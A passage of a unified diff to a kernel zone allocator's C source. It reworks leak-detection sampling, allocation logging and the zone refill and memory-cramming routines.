+ * Just bail - if we're trying to record the leaker, hopefully the other trace will be deallocated + * and get out of the way for later chances + */ + trace->zt_collisions++; + z_trace_collisions++; + + lck_spin_unlock(&zleak_lock); + return TRUE; + } else if (trace->zt_size > 0) { + /* Same trace, already added, so increment refcount */ + trace->zt_size += allocation_size; + } else { + /* Found an unused trace bucket, record the trace here! */ + if (trace->zt_depth != 0) { /* if this slot was previously used but not currently in use */ + z_trace_overwrites++; + } + + z_trace_recorded++; + trace->zt_size = allocation_size; + memcpy(trace->zt_stack, bt, (depth * sizeof(uintptr_t))); + + trace->zt_depth = depth; + trace->zt_collisions = 0; + } + + /* STEP 2: Store the allocation record in the allocations array. */ + + if (allocation->za_element != (uintptr_t) 0) { + /* + * Straight up replace any allocation record that was there. We don't want to do the work + * to preserve the allocation entries that were there, because we only record a subset of the + * allocations anyways. + */ + + z_alloc_collisions++; + + struct ztrace* associated_trace = &ztraces[allocation->za_trace_index]; + /* Knock off old allocation's size, not the new allocation */ + associated_trace->zt_size -= allocation->za_size; + } else if (allocation->za_trace_index != 0) { + /* Slot previously used but not currently in use */ + z_alloc_overwrites++; + } + + allocation->za_element = addr; + allocation->za_trace_index = trace_index; + allocation->za_size = allocation_size; + + z_alloc_recorded++; + + if (top_ztrace->zt_size < trace->zt_size) { + top_ztrace = trace; + } + + lck_spin_unlock(&zleak_lock); + return TRUE; +} + +/* + * Free the allocation record and release the stacktrace. + * This should be as fast as possible because it will be called for every free. 
+ */ +__attribute__((noinline)) +static void +zleak_free(uintptr_t addr, + vm_size_t allocation_size) { - vm_offset_t perm_value = 0; + if (addr == (uintptr_t) 0) { + return; + } + + struct zallocation* allocation = &zallocations[hashaddr(addr, zleak_alloc_buckets)]; + + /* Double-checked locking: check to find out if we're interested, lock, check to make + * sure it hasn't changed, then modify it, and release the lock. + */ + + if (allocation->za_element == addr && allocation->za_trace_index < zleak_trace_buckets) { + /* if the allocation was the one, grab the lock, check again, then delete it */ + lck_spin_lock(&zleak_lock); + + if (allocation->za_element == addr && allocation->za_trace_index < zleak_trace_buckets) { + struct ztrace *trace; + + /* allocation_size had better match what was passed into zleak_log - otherwise someone is freeing into the wrong zone! */ + if (allocation->za_size != allocation_size) { + panic("Freeing as size %lu memory that was allocated with size %lu\n", + (uintptr_t)allocation_size, (uintptr_t)allocation->za_size); + } + + trace = &ztraces[allocation->za_trace_index]; + + /* size of 0 indicates trace bucket is unused */ + if (trace->zt_size > 0) { + trace->zt_size -= allocation_size; + } - if (!zone->zfree_clear_mem) { - perm_value = ZONE_POISON; + /* A NULL element means the allocation bucket is unused */ + allocation->za_element = 0; + } + lck_spin_unlock(&zleak_lock); } +} - vm_offset_t *primary = (vm_offset_t *) addr; - vm_offset_t *backup = get_backup_ptr(zone_elem_size(zone), primary); - - *primary = perm_value; - *backup = perm_value; +#else +static inline void +zleak_activate_if_needed(void) +{ } -#if ZALLOC_ENABLE_POISONING -__abortlike -static void -zone_element_not_clear_panic(zone_t zone, void *addr) +static inline void +zleak_track_if_needed(__unused zone_t z) { - panic("Zone element %p was modified after free for zone %s%s: " - "Expected element to be cleared", addr, zone_heap_name(zone), - zone->z_name); } +#endif /* 
CONFIG_ZLEAKS */ +#if ZONE_ENABLE_LOGGING || CONFIG_ZLEAKS -/* - * Validate that the element was not tampered with while it was in the - * freelist. - */ -void -zalloc_validate_element(zone_t zone, vm_offset_t addr, vm_size_t size, bool validate) +__attribute__((noinline)) +static void +zalloc_log_or_trace_leaks(zone_t zone, vm_offset_t addr, void *fp) { - if (zone->percpu) { - assert(zone->zfree_clear_mem); - zpercpu_foreach_cpu(i) { - if (memcmp_zero_ptr_aligned((void *)(addr + ptoa(i)), size)) { - zone_element_not_clear_panic(zone, (void *)(addr + ptoa(i))); + uintptr_t zbt[MAX_ZTRACE_DEPTH]; /* used in zone leak logging and zone leak detection */ + unsigned int numsaved = 0; + +#if ZONE_ENABLE_LOGGING + if (DO_LOGGING(zone)) { + numsaved = backtrace(zbt, MAX_ZTRACE_DEPTH, NULL); + btlog_add_entry(zone->zlog_btlog, (void *)addr, + ZOP_ALLOC, (void **)zbt, numsaved); + } +#endif /* ZONE_ENABLE_LOGGING */ + +#if CONFIG_ZLEAKS + /* + * Zone leak detection: capture a backtrace every zleak_sample_factor + * allocations in this zone. + */ + if (__improbable(zone->zleak_on)) { + if (sample_counter(&zone->zleak_capture, zleak_sample_factor)) { + /* Avoid backtracing twice if zone logging is on */ + if (numsaved == 0) { + numsaved = backtrace_frame(zbt, MAX_ZTRACE_DEPTH, fp, NULL); + } + /* Sampling can fail if another sample is happening at the same time in a different zone. */ + if (!zleak_log(zbt, addr, numsaved, zone_elem_size(zone))) { + /* If it failed, roll back the counter so we sample the next allocation instead. 
*/ + zone->zleak_capture = zleak_sample_factor; } } - } else if (zone->zfree_clear_mem) { - if (memcmp_zero_ptr_aligned((void *)addr, size)) { - zone_element_not_clear_panic(zone, (void *)addr); - } - } else if (__improbable(validate)) { - const vm_offset_t *p = (vm_offset_t *)addr; - const vm_offset_t *end = (vm_offset_t *)(addr + size); + } - for (; p < end; p++) { - if (*p != ZONE_POISON) { - zone_element_was_modified_panic(zone, addr, - *p, ZONE_POISON, (vm_offset_t)p - addr); - } + if (__improbable(zone_leaks_scan_enable && + !(zone_elem_size(zone) & (sizeof(uintptr_t) - 1)))) { + unsigned int count, idx; + /* Fill element, from tail, with backtrace in reverse order */ + if (numsaved == 0) { + numsaved = backtrace_frame(zbt, MAX_ZTRACE_DEPTH, fp, NULL); } - } else { - /* - * If element wasn't poisoned or entirely cleared, validate that the - * minimum bytes that were cleared on free haven't been corrupted. - * addr is advanced by ptr size as we have already validated and cleared - * the freelist pointer/zcache canary. - */ - if (memcmp_zero_ptr_aligned((void *) (addr + sizeof(vm_offset_t)), - zp_min_size - sizeof(vm_offset_t))) { - zone_element_not_clear_panic(zone, (void *)addr); + count = (unsigned int)(zone_elem_size(zone) / sizeof(uintptr_t)); + if (count >= numsaved) { + count = numsaved - 1; + } + for (idx = 0; idx < count; idx++) { + ((uintptr_t *)addr)[count - 1 - idx] = zbt[idx + 1]; } } +#endif /* CONFIG_ZLEAKS */ } -#endif /* ZALLOC_ENABLE_POISONING */ -#pragma mark Zone Leak Detection +static inline bool +zalloc_should_log_or_trace_leaks(zone_t zone, vm_size_t elem_size) +{ +#if ZONE_ENABLE_LOGGING + if (DO_LOGGING(zone)) { + return true; + } +#endif /* ZONE_ENABLE_LOGGING */ +#if CONFIG_ZLEAKS + /* + * Zone leak detection: capture a backtrace every zleak_sample_factor + * allocations in this zone. 
+ */ + if (zone->zleak_on) { + return true; + } + if (zone_leaks_scan_enable && !(elem_size & (sizeof(uintptr_t) - 1))) { + return true; + } +#endif /* CONFIG_ZLEAKS */ + return false; +} -/* - * Zone leak debugging code - * - * When enabled, this code keeps a log to track allocations to a particular zone that have not - * yet been freed. Examining this log will reveal the source of a zone leak. The log is allocated - * only when logging is enabled, so there is no effect on the system when it's turned off. Logging is - * off by default. - * - * Enable the logging via the boot-args. Add the parameter "zlog=" to boot-args where - * is the name of the zone you wish to log. - * - * This code only tracks one zone, so you need to identify which one is leaking first. - * Generally, you'll know you have a leak when you get a "zalloc retry failed 3" panic from the zone - * garbage collector. Note that the zone name printed in the panic message is not necessarily the one - * containing the leak. So do a zprint from gdb and locate the zone with the bloated size. This - * is most likely the problem zone, so set zlog in boot-args to this zone name, reboot and re-run the test. The - * next time it panics with this message, examine the log using the kgmacros zstack, findoldest and countpcs. - * See the help in the kgmacros for usage info. - * - * - * Zone corruption logging - * - * Logging can also be used to help identify the source of a zone corruption. First, identify the zone - * that is being corrupted, then add "-zc zlog=" to the boot-args. When -zc is used in conjunction - * with zlog, it changes the logging style to track both allocations and frees to the zone. So when the - * corruption is detected, examining the log will show you the stack traces of the callers who last allocated - * and freed any particular element in the zone. Use the findelem kgmacro with the address of the element that's been - * corrupted to examine its history. 
This should lead to the source of the corruption. - */ +#endif /* ZONE_ENABLE_LOGGING || CONFIG_ZLEAKS */ +#if ZONE_ENABLE_LOGGING -/* Returns TRUE if we rolled over the counter at factor */ -__header_always_inline bool -sample_counter(volatile uint32_t *count_p, uint32_t factor) +__attribute__((noinline)) +static void +zfree_log_trace(zone_t zone, vm_offset_t addr, void *fp) { - uint32_t old_count, new_count = 0; - if (count_p != NULL) { - os_atomic_rmw_loop(count_p, old_count, new_count, relaxed, { - new_count = old_count + 1; - if (new_count >= factor) { - new_count = 0; - } - }); + /* + * See if we're doing logging on this zone. + * + * There are two styles of logging used depending on + * whether we're trying to catch a leak or corruption. + */ + if (__improbable(DO_LOGGING(zone))) { + if (corruption_debug_flag) { + uintptr_t zbt[MAX_ZTRACE_DEPTH]; + unsigned int numsaved; + /* + * We're logging to catch a corruption. + * + * Add a record of this zfree operation to log. + */ + numsaved = backtrace_frame(zbt, MAX_ZTRACE_DEPTH, fp, NULL); + btlog_add_entry(zone->zlog_btlog, (void *)addr, ZOP_FREE, + (void **)zbt, numsaved); + } else { + /* + * We're logging to catch a leak. + * + * Remove any record we might have for this element + * since it's being freed. Note that we may not find it + * if the buffer overflowed and that's OK. + * + * Since the log is of a limited size, old records get + * overwritten if there are more zallocs than zfrees. + */ + btlog_remove_entries_for_element(zone->zlog_btlog, (void *)addr); + } } +} - return new_count == 0; +#endif /* ZONE_ENABLE_LOGGING */ + +/* These functions outside of CONFIG_ZLEAKS because they are also used in + * mbuf.c for mbuf leak-detection. This is why they lack the z_ prefix. + */ + +/* "Thomas Wang's 32/64 bit mix functions." 
http://www.concentric.net/~Ttwang/tech/inthash.htm */ +uintptr_t +hash_mix(uintptr_t x) +{ +#ifndef __LP64__ + x += ~(x << 15); + x ^= (x >> 10); + x += (x << 3); + x ^= (x >> 6); + x += ~(x << 11); + x ^= (x >> 16); +#else + x += ~(x << 32); + x ^= (x >> 22); + x += ~(x << 13); + x ^= (x >> 8); + x += (x << 3); + x ^= (x >> 15); + x += ~(x << 27); + x ^= (x >> 31); +#endif + return x; } -#if ZONE_ENABLE_LOGGING -/* Log allocations and frees to help debug a zone element corruption */ -TUNABLE(bool, corruption_debug_flag, "-zc", false); +uint32_t +hashbacktrace(uintptr_t* bt, uint32_t depth, uint32_t max_size) +{ + uintptr_t hash = 0; + uintptr_t mask = max_size - 1; -#define MAX_NUM_ZONES_ALLOWED_LOGGING 10 /* Maximum 10 zones can be logged at once */ + while (depth) { + hash += bt[--depth]; + } -static int max_num_zones_to_log = MAX_NUM_ZONES_ALLOWED_LOGGING; -static int num_zones_logged = 0; + hash = hash_mix(hash) & mask; + + assert(hash < max_size); + + return (uint32_t) hash; +} /* - * The number of records in the log is configurable via the zrecs parameter in boot-args. Set this to - * the number of records you want in the log. For example, "zrecs=10" sets it to 10 records. Since this - * is the number of stacks suspected of leaking, we don't need many records. + * TODO: Determine how well distributed this is + * max_size must be a power of 2. i.e 0x10000 because 0x10000-1 is 0x0FFFF which is a great bitmask + */ +uint32_t +hashaddr(uintptr_t pt, uint32_t max_size) +{ + uintptr_t hash = 0; + uintptr_t mask = max_size - 1; + + hash = hash_mix(pt) & mask; + + assert(hash < max_size); + + return (uint32_t) hash; +} + +#endif /* !ZALLOC_TEST */ +#pragma mark zone (re)fill +#if !ZALLOC_TEST + +/*! + * @defgroup Zone Refill + * @{ + * + * @brief + * Functions handling The zone refill machinery. + * + * @discussion + * Zones are refilled based on 3 mechanisms: direct expansion, async expansion, + * VM-specific replenishment. 
Zones using VM-specific replenishment are marked + * with the @c z_replenishes property set. + * + * @c zalloc_ext() is the codepath that kicks the zone refill when the zone is + * dropping below half of its @c z_elems_rsv (0 for most zones) and will: + * + * - call @c zone_expand_locked() directly if the caller is allowed to block, + * + * - wakeup the asynchronous expansion thread call if the caller is not allowed + * to block. + * + * - call @c zone_replenish_locked() to kick the replenish state machine. + * + * + *

<h2>Synchronous expansion</h2>

+ * + * This mechanism is actually the only one that may refill a zone, and all the + * other ones funnel through this one eventually. + * + * @c zone_expand_locked() implements the core of the expansion mechanism, + * and will do so while a caller specified predicate is true. + * + * Zone expansion allows for up to 2 threads to concurrently refill the zone: + * - one VM privileged thread, + * - one regular thread. + * + * Regular threads that refill will put down their identity in @c z_expander, + * so that priority inversion avoidance can be implemented. + * + * However, VM privileged threads are allowed to use VM page reserves, + * which allows for the system to recover from extreme memory pressure + * situations, allowing for the few allocations that @c zone_gc() or + * killing processes require. + * + * When a VM privileged thread is also expanding, the @c z_expander_vm_priv bit + * is set. @c z_expander is not necessarily the identity of this VM privileged + * thread (it is if the VM privileged thread came in first, but wouldn't be, and + * could even be @c THREAD_NULL otherwise). + * + * Note that the pageout-scan daemon might be BG and is VM privileged. To avoid + * spending a whole pointer on priority inheritance for VM privileged threads + * (and other issues related to having two owners), we use the rwlock boost as + * a stop gap to avoid priority inversions. + * + * + *

<h2>Chunk wiring policies</h2>

+ * + * Zones allocate memory in chunks of @c zone_t::z_chunk_pages pages at a time + * to try to minimize fragmentation relative to element sizes not aligning with + * a chunk size well. However, this can grow large and be hard to fulfill on + * a system under a lot of memory pressure (chunks can be as long as 8 pages on + * 4k page systems). + * + * This is why, when under memory pressure the system allows chunks to be + * partially populated. The metadata of the first page in the chunk maintains + * the count of actually populated pages. + * + * The metadata for addresses assigned to a zone are found on 4 queues: + * - @c z_pageq_empty has chunk heads with populated pages and no allocated + * elements (those can be targeted by @c zone_gc()), + * - @c z_pageq_partial has chunk heads with populated pages that are partially + * used, + * - @c z_pageq_full has chunk heads with populated pages with no free elements + * left, + * - @c z_pageq_va has either chunk heads for sequestered VA space assigned to + * the zone forever (if @c z_va_sequester is enabled), or the first secondary + * metadata for a chunk whose corresponding page is not populated in the + * chunk. + * + * When new pages need to be wired/populated, chunks from the @c z_pageq_va + * queues are preferred. + * + * + *

<h2>Asynchronous expansion</h2>

+ * + * This mechanism allows for refilling zones used mostly with non blocking + * callers. It relies on a thread call (@c zone_expand_callout) which will + * iterate all zones and refill the ones marked with @c z_async_refilling. + * + * NOTE: If the calling thread for zalloc_noblock is lower priority than + * the thread_call, then zalloc_noblock to an empty zone may succeed. + * + * + *

<h2>Dealing with zone allocations from the mach VM code</h2>

+ * + * The implementation of the mach VM itself uses the zone allocator + * for things like the vm_map_entry data structure. In order to prevent + * an infinite recursion problem when adding more pages to a zone, @c zalloc + * uses a replenish thread to refill the VM layer's zones before they have + * too few remaining free entries. The reserved remaining free entries + * guarantee that the VM routines can get entries from already mapped pages. + * + * In order for that to work, the amount of allocations in the nested + * case have to be bounded. There are currently 2 replenish zones, and + * if each needs 1 element of each zone to add a new page to itself, that + * gives us a minimum reserve of 2 elements. + * + * There is also a deadlock issue with the zone garbage collection thread, + * or any thread that is trying to free zone pages. While holding + * the kernel's map lock they may need to allocate new VM map entries, hence + * we need enough reserve to allow them to get past the point of holding the + * map lock. After freeing that page, the GC thread will wait in + * @c zone_reclaim() until the replenish threads can finish. + * Since there's only 1 GC thread at a time, that adds a minimum of 1 to the + * reserve size. + * + * Since the minimum amount you can add to a zone is 1 page, + * we'll use 16K (from ARM) as the refill size on all platforms. + * + * When a refill zone drops to half that available, i.e. REFILL_SIZE / 2, + * @c zalloc_ext() will wake the replenish thread. The replenish thread runs + * until at least REFILL_SIZE worth of free elements exist, before sleeping again. + * In the meantime threads may continue to use the reserve until there are only + * REFILL_SIZE / 4 elements left. Below that point only the replenish threads + * themselves and the GC thread may continue to use from the reserve.
*/ -#if defined(__LP64__) -#define ZRECORDS_MAX 2560 /* Max records allowed in the log */ -#else -#define ZRECORDS_MAX 1536 /* Max records allowed in the log */ -#endif -#define ZRECORDS_DEFAULT 1024 /* default records in log if zrecs is not specificed in boot-args */ - -static TUNABLE(uint32_t, log_records, "zrecs", ZRECORDS_DEFAULT); +static thread_call_data_t zone_expand_callout; -static void -zone_enable_logging(zone_t z) +static inline kma_flags_t +zone_kma_flags(zone_t z, zalloc_flags_t flags) { - z->zlog_btlog = btlog_create(log_records, MAX_ZTRACE_DEPTH, - (corruption_debug_flag == FALSE) /* caller_will_remove_entries_for_element? */); + kma_flags_t kmaflags = KMA_KOBJECT | KMA_ZERO; - if (z->zlog_btlog) { - printf("zone: logging started for zone %s%s\n", - zone_heap_name(z), z->z_name); - } else { - printf("zone: couldn't allocate memory for zrecords, turning off zleak logging\n"); - z->zone_logging = false; + if (z->z_noencrypt) { + kmaflags |= KMA_NOENCRYPT; + } + if (flags & Z_NOPAGEWAIT) { + kmaflags |= KMA_NOPAGEWAIT; + } + if (z->z_permanent || (!z->z_destructible && z->z_va_sequester)) { + kmaflags |= KMA_PERMANENT; } + if (z->z_submap_idx == Z_SUBMAP_IDX_GENERAL && + z->kalloc_heap != KHEAP_ID_NONE) { + kmaflags |= KMA_KHEAP; + } + + return kmaflags; } -/** - * @function zone_setup_logging +/*! + * @function zcram_and_lock() * - * @abstract - * Optionally sets up a zone for logging. + * @brief + * Prepare some memory for being usable for allocation purposes. * * @discussion - * We recognized two boot-args: + * Prepare memory in [addr + ptoa(pg_start), addr + ptoa(pg_end)) + * to be usable in the zone. * - * zlog= - * zrecs= + * This function assumes the metadata is already populated for the range. * - * The zlog arg is used to specify the zone name that should be logged, - * and zrecs is used to control the size of the log. 
+ * Calling this function with @c pg_start being 0 means that the memory + * is either a partial chunk, or a full chunk, that isn't published anywhere + * and the initialization can happen without locks held. * - * If zrecs is not specified, a default value is used. + * Calling this function with a non zero @c pg_start means that we are extending + * an existing chunk: the memory in [addr, addr + ptoa(pg_start)), + * is already usable and published in the zone, so extending it requires holding + * the zone lock. + * + * @param zone The zone to cram new populated pages into + * @param addr The base address for the chunk(s) + * @param pg_va_new The number of virtual pages newly assigned to the zone + * @param pg_start The first newly populated page relative to @a addr. + * @param pg_end The after-last newly populated page relative to @a addr. + * @param kind The kind of memory assigned to the zone. */ static void -zone_setup_logging(zone_t z) +zcram_and_lock(zone_t zone, vm_offset_t addr, uint32_t pg_va_new, + uint32_t pg_start, uint32_t pg_end, zone_addr_kind_t kind) { - char zone_name[MAX_ZONE_NAME]; /* Temp. buffer for the zone name */ - char zlog_name[MAX_ZONE_NAME]; /* Temp. buffer to create the strings zlog1, zlog2 etc... */ - char zlog_val[MAX_ZONE_NAME]; /* the zone name we're logging, if any */ + zone_id_t zindex = zone_index(zone); + vm_offset_t elem_size = zone_elem_size(zone); + uint32_t free_start = 0, free_end = 0; - /* - * Don't allow more than ZRECORDS_MAX records even if the user asked for more. - * - * This prevents accidentally hogging too much kernel memory - * and making the system unusable. 
- */ - if (log_records > ZRECORDS_MAX) { - log_records = ZRECORDS_MAX; - } + struct zone_page_metadata *meta = zone_meta_from_addr(addr); + uint32_t chunk_pages = zone->z_chunk_pages; - /* - * Append kalloc heap name to zone name (if zone is used by kalloc) - */ - snprintf(zone_name, MAX_ZONE_NAME, "%s%s", zone_heap_name(z), z->z_name); + assert(pg_start < pg_end && pg_end <= chunk_pages); - /* zlog0 isn't allowed. */ - for (int i = 1; i <= max_num_zones_to_log; i++) { - snprintf(zlog_name, MAX_ZONE_NAME, "zlog%d", i); + if (pg_start == 0) { + uint16_t chunk_len = (uint16_t)pg_end; + uint16_t secondary_len = ZM_SECONDARY_PAGE; + bool inline_bitmap = false; - if (PE_parse_boot_argn(zlog_name, zlog_val, sizeof(zlog_val)) && - track_this_zone(zone_name, zlog_val)) { - z->zone_logging = true; - num_zones_logged++; - break; + if (zone->z_percpu) { + chunk_len = 1; + secondary_len = ZM_SECONDARY_PCPU_PAGE; + assert(pg_end == zpercpu_count()); + } + if (!zone->z_permanent) { + inline_bitmap = zone->z_chunk_elems <= 32 * chunk_pages; + } + + meta[0] = (struct zone_page_metadata){ + .zm_index = zindex, + .zm_inline_bitmap = inline_bitmap, + .zm_chunk_len = chunk_len, + }; + if (kind == ZONE_ADDR_FOREIGN) { + /* Never hit z_pageq_empty */ + meta[0].zm_alloc_size = ZM_ALLOC_SIZE_LOCK; + } + + for (uint16_t i = 1; i < chunk_pages; i++) { + meta[i] = (struct zone_page_metadata){ + .zm_index = zindex, + .zm_inline_bitmap = inline_bitmap, + .zm_chunk_len = secondary_len, + .zm_page_index = i, + }; + } + + free_end = (uint32_t)ptoa(chunk_len) / elem_size; + if (!zone->z_permanent) { + zone_meta_bits_init(meta, free_end, zone->z_chunk_elems); } + } else { + assert(!zone->z_percpu && !zone->z_permanent); + + free_end = (uint32_t)ptoa(pg_end) / elem_size; + free_start = (uint32_t)ptoa(pg_start) / elem_size; + } + +#if VM_MAX_TAG_ZONES + if (__improbable(zone->tags)) { + assert(kind == ZONE_ADDR_NATIVE && !zone->z_percpu); + ztMemoryAdd(zone, addr + ptoa(pg_start), + ptoa(pg_end - 
pg_start)); } +#endif /* VM_MAX_TAG_ZONES */ /* - * Backwards compat. with the old boot-arg used to specify single zone - * logging i.e. zlog Needs to happen after the newer zlogn checks - * because the prefix will match all the zlogn - * boot-args. + * Insert the initialized pages / metadatas into the right lists. */ - if (!z->zone_logging && - PE_parse_boot_argn("zlog", zlog_val, sizeof(zlog_val)) && - track_this_zone(zone_name, zlog_val)) { - z->zone_logging = true; - num_zones_logged++; + + zone_lock(zone); + assert(zone->z_self == zone); + + if (pg_start != 0) { + assert(meta->zm_chunk_len == pg_start); + + zone_meta_bits_merge(meta, free_start, free_end); + meta->zm_chunk_len = (uint16_t)pg_end; + + /* + * consume the zone_meta_lock_in_partial() + * done in zone_expand_locked() + */ + zone_meta_alloc_size_sub(zone, meta, ZM_ALLOC_SIZE_LOCK); + zone_meta_remqueue(zone, meta); } + if (zone->z_permanent || meta->zm_alloc_size) { + zone_meta_queue_push(zone, &zone->z_pageq_partial, meta); + } else { + zone_meta_queue_push(zone, &zone->z_pageq_empty, meta); + zone->z_wired_empty += zone->z_percpu ? 1 : pg_end; + } + if (pg_end < chunk_pages) { + /* push any non populated residual VA on z_pageq_va */ + zone_meta_queue_push(zone, &zone->z_pageq_va, meta + pg_end); + } - /* - * If we want to log a zone, see if we need to allocate buffer space for - * the log. - * - * Some vm related zones are zinit'ed before we can do a kmem_alloc, so - * we have to defer allocation in that case. - * - * zone_init() will finish the job. - * - * If we want to log one of the VM related zones that's set up early on, - * we will skip allocation of the log until zinit is called again later - * on some other zone. - */ - if (z->zone_logging && startup_phase >= STARTUP_SUB_KMEM_ALLOC) { - zone_enable_logging(z); + zone_elems_free_add(zone, free_end - free_start); + zone->z_elems_avail += free_end - free_start; + zone->z_wired_cur += zone->z_percpu ? 
1 : pg_end - pg_start; + if (pg_va_new) { + zone->z_va_cur += zone->z_percpu ? 1 : pg_va_new; + } + if (zone->z_wired_hwm < zone->z_wired_cur) { + zone->z_wired_hwm = zone->z_wired_cur; } + + os_atomic_add(&zones_phys_page_mapped_count, pg_end - pg_start, relaxed); } -/* - * Each record in the log contains a pointer to the zone element it refers to, - * and a small array to hold the pc's from the stack trace. A - * record is added to the log each time a zalloc() is done in the zone_of_interest. For leak debugging, - * the record is cleared when a zfree() is done. For corruption debugging, the log tracks both allocs and frees. - * If the log fills, old records are replaced as if it were a circular buffer. - */ +static void +zcram(zone_t zone, vm_offset_t addr, uint32_t pages, zone_addr_kind_t kind) +{ + uint32_t chunk_pages = zone->z_chunk_pages; + assert(pages % chunk_pages == 0); + for (; pages > 0; pages -= chunk_pages, addr += ptoa(chunk_pages)) { + zcram_and_lock(zone, addr, chunk_pages, 0, chunk_pages, kind); + zone_unlock(zone); + } +} -/* - * Decide if we want to log this zone by doing a string compare between a zone name and the name - * of the zone to log. Return true if the strings are equal, false otherwise. Because it's not - * possible to include spaces in strings passed in via the boot-args, a period in the logname will - * match a space in the zone name. - */ +void +zone_cram_foreign(zone_t zone, vm_offset_t newmem, vm_size_t size) +{ + uint32_t pages = (uint32_t)atop(size); -/* - * Test if we want to log this zalloc/zfree event. We log if this is the zone we're interested in and - * the buffer for the records has been allocated. 
- */ + if (!from_zone_map(newmem, size, ZONE_ADDR_FOREIGN)) { + panic("zone_cram_foreign: foreign memory [%p] being crammed is " + "outside of expected range", (void *)newmem); + } + if (!zone->z_allows_foreign) { + panic("zone_cram_foreign: foreign memory [%p] being crammed in " + "zone '%s%s' not expecting it", (void *)newmem, + zone_heap_name(zone), zone_name(zone)); + } + if (size % ptoa(zone->z_chunk_pages)) { + panic("zone_cram_foreign: foreign memory [%p] being crammed has " + "invalid size %zx", (void *)newmem, (size_t)size); + } + if (startup_phase >= STARTUP_SUB_ZALLOC) { + panic("zone_cram_foreign: foreign memory [%p] being crammed " + "after zalloc is initialized", (void *)newmem); + } -#define DO_LOGGING(z) (z->zlog_btlog != NULL) -#else /* !ZONE_ENABLE_LOGGING */ -#define DO_LOGGING(z) 0 -#endif /* !ZONE_ENABLE_LOGGING */ + bzero((void *)newmem, size); + zcram(zone, newmem, pages, ZONE_ADDR_FOREIGN); +} + +void +zone_fill_initially(zone_t zone, vm_size_t nelems) +{ + kma_flags_t kmaflags; + kern_return_t kr; + vm_offset_t addr; + uint32_t pages; + + assert(!zone->z_permanent && !zone->collectable && !zone->z_destructible); + assert(zone->z_elems_avail == 0); + + kmaflags = zone_kma_flags(zone, Z_WAITOK) | KMA_PERMANENT; + pages = zone_alloc_pages_for_nelems(zone, nelems); + kr = kernel_memory_allocate(zone_submap(zone), &addr, ptoa(pages), + 0, kmaflags, VM_KERN_MEMORY_ZONE); + if (kr != KERN_SUCCESS) { + panic("kernel_memory_allocate() of %u pages failed", pages); + } + + zone_meta_populate(addr, ptoa(pages)); + zcram(zone, addr, pages, ZONE_ADDR_NATIVE); +} + +static vm_offset_t +zone_allocate_va(zone_t z, zalloc_flags_t flags) +{ + kma_flags_t kmaflags = zone_kma_flags(z, flags) | KMA_VAONLY; + vm_size_t size = ptoa(z->z_chunk_pages); + kern_return_t kr; + vm_offset_t addr; + + kr = kernel_memory_allocate(zone_submap(z), &addr, size, 0, + kmaflags, VM_KERN_MEMORY_ZONE); + +#if !__LP64__ + if (kr == KERN_NO_SPACE && z->z_replenishes) { + /* + * On 
32bit the zone submaps do not have as much VA + * available, so use the VA reserved map for this + * purpose. + */ + vm_map_t map = zone_submaps[Z_SUBMAP_IDX_VA_RESERVE]; + kr = kernel_memory_allocate(map, &addr, size, 0, + kmaflags, VM_KERN_MEMORY_ZONE); + } +#endif + + if (kr == KERN_SUCCESS) { +#if ZALLOC_EARLY_GAPS + if (__improbable(zone_caching_disabled < 0)) { + zone_allocate_random_early_gap(z); + } +#endif /* ZALLOC_EARLY_GAPS */ + zone_meta_populate(addr, size); + return addr; + } + panic_include_zprint = TRUE; #if CONFIG_ZLEAKS + if ((zleak_state & ZLEAK_STATE_ACTIVE)) { + panic_include_ztrace = TRUE; + } +#endif /* CONFIG_ZLEAKS */ + zone_t zone_largest = zone_find_largest(); + panic("zalloc: zone map exhausted while allocating from zone [%s%s], " + "likely due to memory leak in zone [%s%s] " + "(%luM, %d elements allocated)", + zone_heap_name(z), zone_name(z), + zone_heap_name(zone_largest), zone_name(zone_largest), + (unsigned long)zone_size_wired(zone_largest) >> 20, + zone_count_allocated(zone_largest)); +} -/* - * The zone leak detector, abbreviated 'zleak', keeps track of a subset of the currently outstanding - * allocations made by the zone allocator. Every zleak_sample_factor allocations in each zone, we capture a - * backtrace. Every free, we examine the table and determine if the allocation was being tracked, - * and stop tracking it if it was being tracked. - * - * We track the allocations in the zallocations hash table, which stores the address that was returned from - * the zone allocator. Each stored entry in the zallocations table points to an entry in the ztraces table, which - * stores the backtrace associated with that allocation. This provides uniquing for the relatively large - * backtraces - we don't store them more than once. - * - * Data collection begins when the zone map is 50% full, and only occurs for zones that are taking up - * a large amount of virtual space. 
- */ -#define ZLEAK_STATE_ENABLED 0x01 /* Zone leak monitoring should be turned on if zone_map fills up. */ -#define ZLEAK_STATE_ACTIVE 0x02 /* We are actively collecting traces. */ -#define ZLEAK_STATE_ACTIVATING 0x04 /* Some thread is doing setup; others should move along. */ -#define ZLEAK_STATE_FAILED 0x08 /* Attempt to allocate tables failed. We will not try again. */ -uint32_t zleak_state = 0; /* State of collection, as above */ +static bool +zone_expand_pred_nope(__unused zone_t z) +{ + return false; +} -boolean_t panic_include_ztrace = FALSE; /* Enable zleak logging on panic */ -vm_size_t zleak_global_tracking_threshold; /* Size of zone map at which to start collecting data */ -vm_size_t zleak_per_zone_tracking_threshold; /* Size a zone will have before we will collect data on it */ -unsigned int zleak_sample_factor = 1000; /* Allocations per sample attempt */ +static inline void +ZONE_TRACE_VM_KERN_REQUEST_START(vm_size_t size) +{ +#if DEBUG || DEVELOPMENT + VM_DEBUG_CONSTANT_EVENT(vm_kern_request, VM_KERN_REQUEST, DBG_FUNC_START, + size, 0, 0, 0); +#else + (void)size; +#endif +} -/* - * Counters for allocation statistics. 
- */ +static inline void +ZONE_TRACE_VM_KERN_REQUEST_END(uint32_t pages) +{ +#if DEBUG || DEVELOPMENT + task_t task = current_task(); + if (pages && task) { + ledger_credit(task->ledger, task_ledgers.pages_grabbed_kern, pages); + } + VM_DEBUG_CONSTANT_EVENT(vm_kern_request, VM_KERN_REQUEST, DBG_FUNC_END, + pages, 0, 0, 0); +#else + (void)pages; +#endif +} + +static void +zone_expand_locked(zone_t z, zalloc_flags_t flags, bool (*pred)(zone_t)) +{ + thread_t self = current_thread(); + bool vm_priv = (self->options & TH_OPT_VMPRIV); + bool clear_vm_priv; + + for (;;) { + if (!pred) { + /* NULL pred means "try just once" */ + pred = zone_expand_pred_nope; + } else if (!pred(z)) { + return; + } + + if (vm_priv && !z->z_expander_vm_priv) { + /* + * Claim the vm priv overcommit slot + * + * We do not track exact ownership for VM privileged + * threads, so use the rwlock boost as a stop-gap + * just in case. + */ + set_thread_rwlock_boost(); + z->z_expander_vm_priv = true; + clear_vm_priv = true; + } else { + clear_vm_priv = false; + } -/* Times two active records 